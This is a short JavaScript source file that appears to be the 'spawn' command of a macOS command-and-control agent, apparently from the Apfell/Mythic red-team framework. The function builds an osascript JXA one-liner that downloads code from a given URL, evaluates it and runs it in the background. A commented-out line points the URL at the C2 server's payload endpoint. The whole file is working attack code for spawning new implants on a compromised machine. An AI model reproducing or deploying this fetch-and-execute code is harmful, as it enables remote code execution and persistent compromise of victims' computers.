exports.spawn = function(task, command, params){
    split_params = params.split(" ");
    if(split_params[0] == "shell_api"){
        if(split_params[1] == "oneliner"){
            if(split_params[2] == "apfell-jxa"){
                //full_url = C2.baseurl + "api/v1.0/payloads/get/" + split_params[3];
                full_url = split_params[3];
                path = "/usr/bin/osascript";
                args = ['-l','JavaScript','-e'];
                command = "eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding($.NSData.dataWithContentsOfURL($.NSURL.URLWithString(";
                command = command + "'" + full_url + "')),$.NSUTF8StringEncoding)));";
                args.push(command);
                args.push("&");

                return commands_dict["shell_api"](null, null, JSON.stringify({"path": path, "args": args}));
            }
        }
    }
};